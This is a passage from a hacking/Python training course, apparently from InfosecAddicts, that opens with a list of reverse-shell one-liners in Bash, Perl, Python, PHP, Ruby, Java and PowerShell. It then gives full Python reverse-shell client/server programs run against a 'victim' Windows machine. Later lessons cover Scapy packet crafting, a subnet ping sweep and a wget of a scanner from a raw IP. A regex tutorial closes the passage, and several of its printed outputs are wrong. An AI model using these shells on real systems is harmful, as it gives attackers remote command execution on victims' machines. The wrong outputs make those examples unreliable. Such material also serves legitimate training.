1323. Lots of reverse shells in different languages
1324. ---------------------------------------------------------------------
1325.  
1326.  
1327.  
1328. ########
1329. # Bash #
1330. ########
1331.  
1332. ---------------------------Type This-----------------------------------
1333.  
1334.  
1335. bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
1336.  
1337. ----------------------------------------------------------------------
1338.  
1339.  
1340. ########
1341. # Perl #
1342. ########
1343.  
1344. ---------------------------Type This-----------------------------------
1345.  
1346.  
1347. perl -e 'use Socket;$i="127.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
1348.  
1349.  
1350.  
1351. cat perlbackdoor.pl
1352. #!/usr/bin/perl
1353. use Socket;
1354. use FileHandle;
1355. $IP = $ARGV[0];
1356. $PORT = $ARGV[1];
1357. socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
1358. connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
1359. SOCKET->autoflush();
1360. open(STDIN, ">&SOCKET");
1361. open(STDOUT,">&SOCKET");
1362. open(STDERR,">&SOCKET");
1363. system("/bin/sh -i");
1364.  
1365. ----------------------------------------------------------------------
1366.  
1367. ##########
1368. # Python #
1369. ##########
1370.  
1371. ---------------------------Type This-----------------------------------
1372.  
1373. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
1374.  
1375. ----------------------------------------------------------------------
1376.  
1377. #######
1378. # Php #
1379. #######
1380. ---------------------------Type This-----------------------------------
1381.  
1382. php -r '$sock=fsockopen("127.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
1383.  
1384. ----------------------------------------------------------------------
1385.  
1386. ########
1387. # ruby #
1388. ########
1389. ---------------------------Type This-----------------------------------
1390.  
1391. ruby -rsocket -e'f=TCPSocket.open("127.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
1392.  
1393. ----------------------------------------------------------------------
1394.  
1395.  
1396. ########
1397. # Java #
1398. ########
1399. ---------------------------Type This-----------------------------------
1400.  
1401. r = Runtime.getRuntime()
1402. p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
1403. p.waitFor()
1404.  
1405.  
1406. exec 5<>/dev/tcp/127.0.0.1/1234
1407.  
1408.  
1409. cat <&5 | while read line; do $line 2>&5 >&5; done
1410.  
1411. exec 5<>/dev/tcp/127.0.0.1/1234
1412.  
1413. while read line 0<&5; do $line 2>&5 >&5; done
1414. 0<&196;exec 196<>/dev/tcp/127.0.0.1/1234; sh <&196 >&196 2>&196
1415.  
1416. ----------------------------------------------------------------------
1417.  
1418. ##############
1419. # Powershell #
1420. ##############
1421. ---------------------------Type This-----------------------------------
1422.  
1423. powershell -command "function ReverseShellClean {if ($client.Connected -eq $true) {$client.Close()};  if ($process.ExitCode -ne $null) {$process.Close()};  exit;  };$address = '127.0.0.1';  $port = '1234';$client = New-Object system.net.sockets.tcpclient; $client.connect($address,$port) ;$stream = $client.GetStream();$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize  ;$process = New-Object System.Diagnostics.Process  ;$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'  ;$process.StartInfo.RedirectStandardInput = 1  ;$process.StartInfo.RedirectStandardOutput = 1;$process.StartInfo.UseShellExecute = 0  ;$process.Start()  ;$inputstream = $process.StandardInput  ;$outputstream = $process.StandardOutput  ;Start-Sleep 1  ;$encoding = new-object System.Text.AsciiEncoding  ;while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())};$stream.Write($encoding.GetBytes($out),0,$out.Length)  ;$out = $null; $done = $false; $testing = 0; ;while (-not $done) {if ($client.Connected -ne $true) {cleanup}  ;$pos = 0; $i = 1;  while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos);  $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}  ;if ($pos -gt 0){ $string = $encoding.GetString($networkbuffer,0,$pos);  $inputstream.write($string);  start-sleep 1;  if ($process.ExitCode -ne $null) {ReverseShellClean};else {  $out = $encoding.GetString($outputstream.Read()); while($outputstream.Peek() -ne -1){;  $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}};  $stream.Write($encoding.GetBytes($out),0,$out.length);  $out = $null;  $string = $null}} else {ReverseShellClean}};"
1424.  
1425.  
1426.  
1427. ----------------------------------------------------------------------
1428.  
1429.  
1430.  
1431.  
1432.  
1433. ###############################
1434. # Reverse Shell in Python 3.6 #
1435. ###############################
1436.  
1437. We'll create 2 python files. One for the server and one for the client.
1438.  
1439. - Below is the python code that is running on victim/client Windows machine:
1440.  
1441. ---------------------------Paste This-----------------------------------
1442.  
1443. # Client
1444.  
1445. import socket # For Building TCP Connection
1446. import subprocess # To start the shell in the system
1447.  
1448. def connect():
1449.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1450.     s.connect(('192.168.1.52',8083))
1451.  
1452.     while True:                         #keep receiving commands
1453.         command = s.recv(1024)
1454.  
1455.         if 'terminate'.encode() in command:
1456.             s.close() #close the socket
1457.             break
1458.  
1459.         else:
1460.  
1461.             CMD = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
1462.             s.send( CMD.stdout.read()  )  # send the result
1463.             s.send( CMD.stderr.read()  )  # incase you mistyped a command.
1464.             # we will send back the error
1465.  
1466. def main ():
1467.     connect()
1468. main()
1469.  
1470.  
1471.  
1472.  
1473. ----------------------------------------------------------------------
1474.  
1475. - Below is the code that we should run on server unit, in our case InfosecAddicts Ubuntu machine ( Ubuntu IP: 192.168.243.150 )
1476.  
1477. ---------------------------Paste This-----------------------------------
1478.  
1479. # Server
1480.  
1481. import socket # For Building TCP Connection
1482.  
1483.  
1484. def connect ():
1485.  
1486.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1487.     s.bind(("192.168.1.52", 8083))
1488.     s.listen(1)
1489.     conn, addr = s.accept()
1490.     print ('[+] We got a connection from:  '.encode(), addr)
1491.  
1492.  
1493.     while True:
1494.          command = input("Shell> ".encode())
1495.  
1496.          if 'terminate' in command:
1497.              conn.send('termminate')
1498.              conn.close()  # close the connection with host
1499.              break
1500.  
1501.          else:
1502.              conn.send(command)   #send command
1503.              print (conn.recv(1024))
1504.  
1505. def main ():
1506.     connect()
1507. main()
1508.  
1509. ----------------------------------------------------------------------
1510.  
1511. - First run server.py code from Ubuntu machine. From command line type:
1512.  
1513. ---------------------------Type This-----------------------------------
1514.  
1515. python server.py
1516.  
1517.  
1518. ----------------------------------------------------------------------
1519.  
1520. - First run server.py code from Ubuntu machine. From command line type:
1521.  
1522. ---------------------------Type This-----------------------------------
1523.  
1524. python server.py
1525.  
1526. ----------------------------------------------------------------------
1527.  
1528. - then check if 8080 port is open, and if we are listening on 8080:
1529.  
1530. ---------------------------Type This-----------------------------------
1531.  
1532. netstat -antp | grep "8080"
1533.  
1534. ----------------------------------------------------------------------
1535.  
1536. - Then on victim ( Windows ) unit run client.py code.
1537.  
1538.  
1539. - Connection will be established, and you will get a shell on Ubuntu:
1540.  
1541. ---------------------------Type This-----------------------------------
1542.  
1543. infosecaddicts@ubuntu:~$ python server.py
1544. [+] We got a connection from:   ('192.168.243.1', 56880)
1545. Shell> arp -a
1546.  
1547. Shell> ipconfig
1548.  
1549. Shell> dir
1550. ----------------------------------------------------------------------
1551.  
1552.  
1553.  
1554.  
1555. it was not possible to do this in python 3
1556.  
1557. ##########################################
1558. # HTTP based reverse shell in Python 3.6 #
1559. ##########################################
1560.  
1561.  
1562. - The easiest way to install python modules and keep them up-to-date is with a Python-based package manager called Pip
1563. - Download get-pip.py from https://bootstrap.pypa.io/get-pip.py on your Windows machine
1564.  
1565. Then run python get-pip.py from command line. Once pip is installed you may use it to install packages.
1566.  
1567. - Install requests package:
1568. ---------------------------Type This-----------------------------------
1569.  
1570.      python -m pip install requests
1571.  
1572. ----------------------------------------------------------------------
1573.  
1574. - Copy and paste below code into client_http.py on your Windows machine:
1575.  
1576. - In my case server/ubuntu IP is 192.168.243.150. You need to change IP to your server address, in both codes (client_http.py, server_HTTP.py)
1577.  
1578. ---------------------------Paste This-----------------------------------
1579. #######import BaseHTTPServer does not work in python 3.x#####
1580.  
1581. # client_http
1582.  
1583. import requests
1584. import subprocess
1585. import time
1586.  
1587.  
1588. while True:
1589.     req = requests.get('http://192.168.243.150')
1590.     command = req.text
1591.  
1592.     if 'terminate' in command:
1593.         break
1594.  
1595.     else:
1596.         CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
1597.         post_response = requests.post(url='http://192.168.243.150', data=CMD.stdout.read() )
1598.         post_response = requests.post(url='http://192.168.243.150', data=CMD.stderr.read() )
1599.  
1600.     time.sleep(3)
1601.  
1602. ----------------------------------------------------------------------
1603.  
1604. - Copy and paste below code into server_HTTP.py on your Ubuntu unit (server):
1605.  
1606.  
1607. ---------------------------Paste This-----------------------------------
1608. ###import BaseHTTPServer does not work in python 3.x####
1609. import BaseHTTPServer
1610. HOST_NAME = '192.168.243.150'
1611. PORT_NUMBER = 80
1612. class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
1613.  
1614.     def do_GET(s):
1615.         command = raw_input("Shell> ")
1616.         s.send_response(200)
1617.         s.send_header("Content-type", "text/html")
1618.         s.end_headers()
1619.         s.wfile.write(command)
1620.  
1621.  
1622.     def do_POST(s):
1623.         s.send_response(200)
1624.         s.end_headers()
1625.         length = int(s.headers['Content-Length'])
1626.         postVar = s.rfile.read(length)
1627.         print postVar
1628.  
1629. if __name__ == '__main__':
1630.     server_class = BaseHTTPServer.HTTPServer
1631.     httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
1632.  
1633.     try:
1634.         httpd.serve_forever()                            
1635.     except KeyboardInterrupt:
1636.         print'[!] Server is terminated'
1637.         httpd.server_close()
1638.  
1639. ----------------------------------------------------------------------
1640.  
1641. - run server_HTTP.py on Ubuntu with next command:
1642.  
1643. ---------------------------Type This-----------------------------------
1644.  
1645. infosecaddicts@ubuntu:~$ sudo python server_HTTP.py
1646.  
1647. ----------------------------------------------------------------------
1648.  
1649.  
1650. - on Windows machine run client_http.py
1651.  
1652. - on Ubuntu you will see that connection is established:
1653.  
1654. ---------------------------Type This-----------------------------------
1655.  
1656. infosecaddicts@ubuntu:~$ sudo python server_HTTP.py
1657. Shell> dir
1658. ----------------------------------------------------------------------
1659.  
1660. 192.168.243.1 - - [25/Sep/2017 12:21:40] "GET / HTTP/1.1" 200 -
1661. 192.168.243.1 - - [25/Sep/2017 12:21:40] "POST / HTTP/1.1" 200 -
1662.  Volume in drive C has no label.
1663.  
1664. ________________________________________________________________________
1665.  
1666.  
1667.  
1668.  
1669. ############################################
1670. # Multi-Threaded Reverse Shell in Python 3 #
1671. ############################################
1672.  
1673.  
1674. - We'll again create 2 files, one for server and one for client/victim. This code is adjusted to work on python2.7
1675.  
1676. Copy and paste code from below into server.py file on Ubuntu(server) machine and run it with command python server.py:
1677.  
1678.  
1679. Server.py code:
1680. ---------------------------Paste This-----------------------------------
1681.  
1682.  
1683. import socket
1684. import sys
1685.  
1686. # Create socket (allows two computers to connect)
1687.  
1688. def socket_create():
1689.    try:
1690.        global host
1691.        global port
1692.        global s
1693.        host = ''
1694.        port = 9999
1695.        s = socket.socket()
1696.    except socket.error as msg:
1697.        print("Socket creation error: " + str(msg))
1698.        
1699. # Bind socket to port and wait for connection from client
1700. def socket_bind():
1701.    try:
1702.        global host
1703.        global port
1704.        global s
1705.        print("Binding socket to port: " + str(port))
1706.        s.bind((host,port))
1707.        s.listen(5)
1708.    except socket.error as msg:
1709.        print("Socket binding error: " + str(msg) + "\n" + "Retrying...")
1710.        socket_bind()
1711.  
1712. # Establish a connection with client (socket must be listening for them)
1713. def socket_accept():
1714.    conn, address = s.accept()
1715.    print("Connection has been established | " + "IP " + address[0] + " | Port " + str(address[1]))
1716.    send_commands(conn)
1717.    conn.close()
1718.  
1719.  
1720. # Send commands    
1721. def send_commands(conn):
1722.    while True:
1723.        cmd = input()                          #input() is changed to raw_input() in order to work on python2.7
1724.        if cmd == 'quit':
1725.            conn.close()
1726.            s.close()
1727.            sys.exit()
1728.        if len(str.encode(cmd))>0:
1729.            conn.send(str.encode(cmd))
1730.            client_response = str(conn.recv(1024))  # had issue with encoding and I have removed utf-8 from client_response = str(conn.recv(1024),"utf-8")
1731.            print(client_response)
1732. # References for str.encode/decode
1733. # https://www.tutorialspoint.com/python/string_encode.htm
1734. # https://www.tutorialspoint.com/python/string_decode.htm
1735.  
1736.  
1737. def main():
1738.    socket_create()
1739.    socket_bind()
1740.    socket_accept()
1741.  
1742. main()
1743.  
1744.  
1745.  
1746.  
1747.    
1748. ----------------------------------------------------------------------
1749.  
1750.  
1751. -After you have aleady run server.py on Ubuntu, you can then run client.py file from Windows(client) unit. Code is below:
1752.  
1753. Client.py code:
1754.  
1755. ---------------------------Paste This-----------------------------------
1756.  
1757. import os
1758. import socket
1759. import subprocess
1760.  
1761. s = socket.socket()
1762. host = '192.168.1.54'    # change to IP address of your server
1763. port = 9999
1764. s.connect((host, port))
1765.  
1766. while True:
1767.    data = s.recv(1024)
1768.    if data[:2].decode("utf-8") == 'cd':
1769.        os.chdir(data[3:].decode("utf-8"))
1770.    if len(data) > 0:
1771.        cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
1772.        output_bytes = cmd.stdout.read() + cmd.stderr.read()
1773.        output_str = str(output_bytes)                         # had issue with encoding, in origin code is output_str = str(output_bytes, "utf-8")
1774.        s.send(str.encode(output_str + str(os.getcwd()) + '> '))
1775.        print(output_str)
1776. # References for str.encode/decode
1777. # https://www.tutorialspoint.com/python/string_encode.htm
1778. # https://www.tutorialspoint.com/python/string_decode.htm
1779.        
1780. # Close connection
1781. s.close()
1782.  
1783.  
1784. ----------------------------------------------------------------------
1785.  
1786. ---------------------------Type This-----------------------------------
1787.  
1788. python client.py
1789. ----------------------------------------------------------------------
1790.  
1791. - Then return back to Ubuntu and you will see that connection is established and you can run commands from shell.
1792.  
1793. ---------------------------Type This-----------------------------------
1794.  
1795. infosecaddicts@ubuntu:~$ python server.py
1796.  
1797. ----------------------------------------------------------------------
1798.  
1799. Binding socket to port: 9999
1800. Connection has been established | IP 192.168.243.1 | Port 57779
1801. dir
1802. Volume in drive C has no label.
1803.  
1804.  
1805. Directory of C:\Python27
1806.  
1807.  
1808.  
1809.  
1810. ###############################
1811. # Lesson 21: Installing Scapy #
1812. ###############################
1813.  
1814. ---------------------------Type This-----------------------------------
1815.  
1816. sudo apt-get update
1817. sudo apt-get install python-scapy python-pyx python-gnuplot
1818.  
1819. ----------------------------------------------------------------------
1820.  
1821. Reference Page For All Of The Commands We Will Be Running:
1822. http://samsclass.info/124/proj11/proj17-scapy.html
1823.  
1824. Great slides for Scapy:
1825. http://www.secdev.org/conf/scapy_csw05.pdf
1826.  
1827.  
1828.  
1829.  
1830. To run Scapy interactively
1831. ---------------------------Type This-----------------------------------
1832.  
1833.     sudo scapy
1834.  
1835. ----------------------------------------------------------------------
1836.  
1837.  
1838. ################################################
1839. # Lesson 22: Sending ICMPv4 Packets with scapy #
1840. ################################################
1841.  
1842. In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:
1843.  
1844. ---------------------------Type This-----------------------------------
1845.  
1846.    i = IP()
1847.  
1848. ----------------------------------------------------------------------
1849.  
1850.  
1851.  
1852. This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:
1853.  
1854. ---------------------------Type This-----------------------------------
1855.  
1856.    i.display()
1857.  
1858. ----------------------------------------------------------------------
1859.  
1860.  
1861.  
1862. Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:
1863.  
1864. ---------------------------Type This-----------------------------------
1865.  
1866.    i.dst="10.65.75.49"
1867.  
1868.    i.display()
1869.  
1870.  
1871. ----------------------------------------------------------------------
1872.  
1873.  
1874. Notice that scapy automatically fills in your machine's source IP address.
1875.  
1876. Use these commands to create an object named ic of type ICMP and display its properties:
1877.  
1878. ---------------------------Type This-----------------------------------
1879.  
1880.     ic = ICMP()
1881.  
1882.     ic.display()
1883.  
1884.  
1885. ----------------------------------------------------------------------
1886.  
1887.  
1888.  
1889. Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:
1890.  
1891. ---------------------------Type This-----------------------------------
1892.  
1893.     sr1(i/ic)
1894.  
1895. ----------------------------------------------------------------------
1896.  
1897.  
1898.  
1899.  
1900. This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. As you can see in the image above, the response is shown, with ICMP type echo-reply.
1901.  
1902. The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.
1903.  
1904. Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):
1905.  
1906. ---------------------------Type This-----------------------------------
1907.  
1908.     sr1(i/ic/"YOUR NAME")
1909.  
1910. ----------------------------------------------------------------------
1911.  
1912. You should see a reply with a Raw section containing your name.
1913.  
1914.  
1915.  
1916. ##############################################
1917. # Lesson 23: Sending a UDP Packet with Scapy #
1918. ##############################################
1919.  
1920.  
1921. Preparing the Target
1922.  
1923. ---------------------------Type This-----------------------------------
1924.  
1925. $ ncat -ulvp 4444
1926.  
1927. ----------------------------------------------------------------------
1928.  
1929.  
1930.  
1931. --open another terminal--
1932. In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:
1933.  
1934. ---------------------------Type This-----------------------------------
1935.  
1936.  
1937.     u = UDP()
1938.  
1939.     u.display()
1940.  
1941. ----------------------------------------------------------------------
1942.  
1943.  
1944. This creates an object named u of type UDP, and displays its properties.
1945.  
1946. Execute these commands to change the destination port to 4444 and display the properties again:
1947.  
1948. ---------------------------Type This-----------------------------------
1949.  
1950.     i.dst="10.10.2.97"              <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
1951.  
1952.     u.dport = 4444
1953.  
1954.     u.display()
1955.  
1956. ----------------------------------------------------------------------
1957.  
1958.  
1959. Execute this command to send the packet to the Windows machine:
1960.  
1961. ---------------------------Type This-----------------------------------
1962.  
1963.     send(i/u/"YOUR NAME SENT VIA UDP\n")
1964.  
1965. ----------------------------------------------------------------------
1966.  
1967.  
1968. On the Windows target, you should see the message appear
1969.  
1970.  
1971.  
1972.  
1973. #######################################
1974. # Lesson 24: Ping Sweeping with Scapy #
1975. #######################################
1976.  
1977. ---------------------------Paste This-----------------------------------
1978. ##############21/05/2019#####################
1979.  
1980. #!/usr/bin/python
1981. from scapy.all import *
1982.  
1983. TIMEOUT = 2
1984. conf.verb = 0
1985. for ip in range(0, 256):
1986.     packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP()
1987.     # You will need to change 10.10.30 above this line to the subnet for your network
1988.     reply = sr1(packet, timeout=TIMEOUT)
1989.     if not (reply is None):
1990.          print reply.dst, "is online"
1991.     else:
1992.          print "Timeout waiting for %s" % packet[IP].dst
1993.  
1994. ----------------------------------------------------------------------
1995.  
1996.  
1997. ###############################################
1998. # Checking out some scapy based port scanners #
1999. ###############################################
2000.  
2001. ---------------------------Type This-----------------------------------
2002. broken link
2003. wget http://45.63.104.73/rdp_scan.py
2004.  
2005. cat rdp_scan.py
2006.  
2007. sudo python rdp_scan.py
2008.  
2009. ----------------------------------------------------------------------
2010.  
2011. ######################################
2012. # Dealing with conf.verb=0 NameError #
2013. ######################################
2014.  
2015. ---------------------------Type This-----------------------------------
2016.  
2017. conf.verb = 0
2018. NameError: name 'conf' is not defined
2019.  
2020. Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from:
2021.  
2022. from scapy import *
2023.     to
2024. from scapy.all import *
2025.  
2026.  
2027.  
2028.  
2029. Reference:
2030. http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html
2031.  
2032.  
2033. conf.verb=0 is a verbosity setting (configuration/verbosity = conv
2034.  
2035.  
2036.  
2037. Here are some good Scapy references:
2038. http://www.secdev.org/projects/scapy/doc/index.html
2039. http://resources.infosecinstitute.com/port-scanning-using-scapy/
2040. http://www.hackerzvoice.net/ouah/blackmagic.txt
2041. http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html
2042.  
2043.  
2044.  
2045.  
2046.  
2047.  
2048.  
2049.  
2050.  
2051. #######################
2052. # Regular Expressions #
2053. #######################
2054.  
2055.  
2056.  
2057. **************************************************
2058. * What is Regular Expression and how is it used? *
2059. **************************************************
2060.  
2061.  
2062. Simply put, regular expression is a sequence of character(s) mainly used to find and replace patterns in a string or file.
2063.  
2064.  
2065. Regular expressions use two types of characters:
2066.  
2067. a) Meta characters: As the name suggests, these characters have a special meaning, similar to * in wildcard.
2068.  
2069. b) Literals (like a,b,1,2…)
2070.  
2071.  
2072. In Python, we have module "re" that helps with regular expressions. So you need to import library re before you can use regular expressions in Python.
2073.  
2074.  
2075. Use this code --> import re
2076.  
2077.  
2078.  
2079.  
2080. The most common uses of regular expressions are:
2081. --------------------------------------------------
2082.  
2083. - Search a string (search and match)
2084. - Finding a string (findall)
2085. - Break string into a sub strings (split)
2086. - Replace part of a string (sub)
2087.  
2088.  
2089.  
2090. Let's look at the methods that library "re" provides to perform these tasks.
2091.  
2092.  
2093.  
2094. ****************************************************
2095. * What are various methods of Regular Expressions? *
2096. ****************************************************
2097.  
2098.  
2099. The ‘re' package provides multiple methods to perform queries on an input string. Here are the most commonly used methods, I will discuss:
2100.  
2101. re.match()
2102. re.search()
2103. re.findall()
2104. re.split()
2105. re.sub()
2106. re.compile()
2107.  
2108. Let's look at them one by one.
2109.  
2110.  
2111. re.match(pattern, string):
2112. -------------------------------------------------
2113.  
2114. This method finds match if it occurs at start of the string. For example, calling match() on the string ‘AV Analytics AV' and looking for a pattern ‘AV' will match. However, if we look for only Analytics, the pattern will not match. Let's perform it in python now.
2115.  
2116. Code
2117. ---------------------------Type This-----------------------------------
2118.  
2119. import re
2120. result = re.match(r'AV', 'AV Analytics ESET AV')
2121. print (result)
2122. ----------------------------------------------------------------------
2123.  
2124. Output:
2125. <_sre.SRE_Match object at 0x0000000009BE4370>
2126.  
2127. Above, it shows that pattern match has been found. To print the matching string we'll use method group (It helps to return the matching string). Use "r" at the start of the pattern string, it designates a python raw string.
2128.  
2129. ---------------------------Type This-----------------------------------
2130.  
2131. import re
2132. result = re.match(r'AV', 'AV Analytics ESET AV')
2133. print (result.group(0))
2134. ----------------------------------------------------------------------
2135.  
2136. Output:
2137. AV
2138.  
2139.  
2140. Let's now find ‘Analytics' in the given string. Here we see that string is not starting with ‘AV' so it should return no match. Let's see what we get:
2141.  
2142.  
2143. Code
2144. ---------------------------Type This-----------------------------------
2145.  
2146. import re
2147. result = re.match(r'Analytics', 'AV Analytics ESET AV')
2148. print (result)
2149.  
2150. ----------------------------------------------------------------------
2151.  
2152.  
2153. Output:
2154. None
2155.  
2156.  
2157. There are methods like start() and end() to know the start and end position of matching pattern in the string.
2158.  
2159. Code
2160. ---------------------------Type This-----------------------------------
2161.  
2162. import re
2163. result = re.match(r'AV', 'AV Analytics ESET AV')
2164. print (result.start())
2165. print (result.end())
2166.  
2167. ----------------------------------------------------------------------
2168.  
2169. Output:
2170. 0
2171. 2
2172.  
2173. Above you can see that start and end position of matching pattern ‘AV' in the string and sometime it helps a lot while performing manipulation with the string.
2174.  
2175.  
2176.  
2177.  
2178.  
2179. re.search(pattern, string):
2180. -----------------------------------------------------
2181.  
2182.  
2183. It is similar to match() but it doesn't restrict us to find matches at the beginning of the string only. Unlike previous method, here searching for pattern ‘Analytics' will return a match.
2184.  
2185. Code
2186. ---------------------------Type This-----------------------------------
2187.  
2188. import re
2189. result = re.search(r'Analytics', 'AV Analytics ESET AV')
2190. print (result.group(0))
2191. ----------------------------------------------------------------------
2192.  
2193. Output:
2194. Analytics
2195.  
2196. Here you can see that, search() method is able to find a pattern from any position of the string but it only returns the first occurrence of the search pattern.
2197.  
2198.  
2199.  
2200.  
2201.  
2202.  
2203. re.findall (pattern, string):
2204. ------------------------------------------------------
2205.  
2206.  
2207. It helps to get a list of all matching patterns. It has no constraints of searching from start or end. If we will use method findall to search ‘AV' in given string it will return both occurrence of AV. While searching a string, I would recommend you to use re.findall() always, it can work like re.search() and re.match() both.
2208.  
2209.  
2210. Code
2211. ---------------------------Type This-----------------------------------
2212.  
2213. import re
2214. result = re.findall(r'AV', 'AV Analytics ESET AV')
2215. print (result)
2216. ----------------------------------------------------------------------
2217.  
2218. Output:
2219. ['AV', 'AV']
2220.  
2221.  
2222.  
2223.  
2224.  
2225. re.split(pattern, string, [maxsplit=0]):
2226. ------------------------------------------------------
2227.  
2228.  
2229.  
2230. This methods helps to split string by the occurrences of given pattern.
2231.  
2232.  
2233. Code
2234. ---------------------------Type This-----------------------------------
2235.  
2236. result=re.split(r'y','Analytics')
2237. result
2238.  ----------------------------------------------------------------------
2239.  
2240. Output:
2241. ['Anal', 'tics']
2242.  
2243. Above, we have split the string "Analytics" by "y". Method split() has another argument "maxsplit". It has default value of zero. In this case it does the maximum splits that can be done, but if we give value to maxsplit, it will split the string. Let's look at the example below:
2244.  
2245.  
2246. Code
2247. ---------------------------Type This-----------------------------------
2248.  
2249. import re
2250. result=re.split(r's','Analytics eset')
2251. print (result)
2252.  
2253. ----------------------------------------------------------------------
2254.  
2255. Output:
2256. ['Analytic', ' e', 'et'] #It has performed all the splits that can be done by pattern "s".
2257.  
2258.  
2259.  
2260. Code
2261. ---------------------------Type This-----------------------------------
2262.  
2263. import re
2264. result=re.split(r's','Analytics eset',maxsplit=1)
2265. print (result)
2266.  
2267. ----------------------------------------------------------------------
2268.  
2269. Output:
2270. []
2271.  
2272.  
2273.  
2274.  
2275.  
2276. re.sub(pattern, repl, string):
2277. ----------------------------------------------------------
2278.  
2279. It helps to search a pattern and replace with a new sub string. If the pattern is not found, string is returned unchanged.
2280.  
2281. Code
2282. ---------------------------Type This-----------------------------------
2283.  
2284. import re
2285. result=re.sub(r'Ruby','Python','Joe likes Ruby')
2286. print (result)
2287. ----------------------------------------------------------------------
2288.  
2289. Output:
2290. ''
2291.  
2292.  
2293.  
2294.  
2295.  
2296. re.compile(pattern, repl, string):
2297. ----------------------------------------------------------
2298.  
2299.  
2300. We can combine a regular expression pattern into pattern objects, which can be used for pattern matching. It also helps to search a pattern again without rewriting it.
2301.  
2302.  
2303. Code
2304. ---------------------------Type This-----------------------------------
2305.  
2306. import re
2307. pattern=re.compile('XSS')
2308. result=pattern.findall('XSS is Cross Site Scripting, XSS')
2309. print (result)
2310. result2=pattern.findall('XSS is Cross Site Scripting, SQLi is Sql Injection')
2311. print (result2)
2312.  
2313. ----------------------------------------------------------------------
2314.  
2315. Output:
2316. ['XSS', 'XSS']
2317. ['XSS']
2318.  
2319. Till now,  we looked at various methods of regular expression using a constant pattern (fixed characters). But, what if we do not have a constant search pattern and we want to return specific set of characters (defined by a rule) from a string?  Don't be intimidated.
2320.  
2321. This can easily be solved by defining an expression with the help of pattern operators (meta  and literal characters). Let's look at the most common pattern operators.
2322.  
2323.  
2324.  
2325.  
2326.  
2327. **********************************************
2328. * What are the most commonly used operators? *
2329. **********************************************
2330.  
2331.  
2332. Regular expressions can specify patterns, not just fixed characters. Here are the most commonly used operators that helps to generate an expression to represent required characters in a string or file. It is commonly used in web scrapping and  text mining to extract required information.
2333.  
2334. Operators   Description
2335. .           Matches with any single character except newline ‘\n'.
2336. ?           match 0 or 1 occurrence of the pattern to its left
2337. +           1 or more occurrences of the pattern to its left
2338. *           0 or more occurrences of the pattern to its left
2339. \w          Matches with a alphanumeric character whereas \W (upper case W) matches non alphanumeric character.
2340. \d          Matches with digits [0-9] and /D (upper case D) matches with non-digits.
2341. \s          Matches with a single white space character (space, newline, return, tab, form) and \S (upper case S) matches any non-white space character.
2342. \b          boundary between word and non-word and /B is opposite of /b
2343. [..]            Matches any single character in a square bracket and [^..] matches any single character not in square bracket
2344. \           It is used for special meaning characters like \. to match a period or \+ for plus sign.
2345. ^ and $         ^ and $ match the start or end of the string respectively
2346. {n,m}           Matches at least n and at most m occurrences of preceding expression if we write it as {,m} then it will return at least any minimum occurrence to max m preceding expression.
2347. a| b            Matches either a or b
2348. ( )         Groups regular expressions and returns matched text
2349. \t, \n, \r  Matches tab, newline, return
2350.  
2351.  
2352. For more details on  meta characters "(", ")","|" and others details , you can refer this link (https://docs.python.org/2/library/re.html).
2353.  
2354. Now, let's understand the pattern operators by looking at the below examples.
2355.  
2356.  
2357.  
2358. ****************************************
2359. * Some Examples of Regular Expressions *
2360. ****************************************
2361.  
2362. ******************************************************
2363. * Problem 1: Return the first word of a given string *
2364. ******************************************************
2365.  
2366.  
2367. Solution-1  Extract each character (using "\w")
2368. ---------------------------------------------------------------------------
2369.  
2370. Code
2371. ---------------------------Type This-----------------------------------
2372.  
2373. import re
2374. result=re.findall(r'.','Python is the best scripting language')
2375. print (result)
2376. ----------------------------------------------------------------------
2377.  
2378. Output:
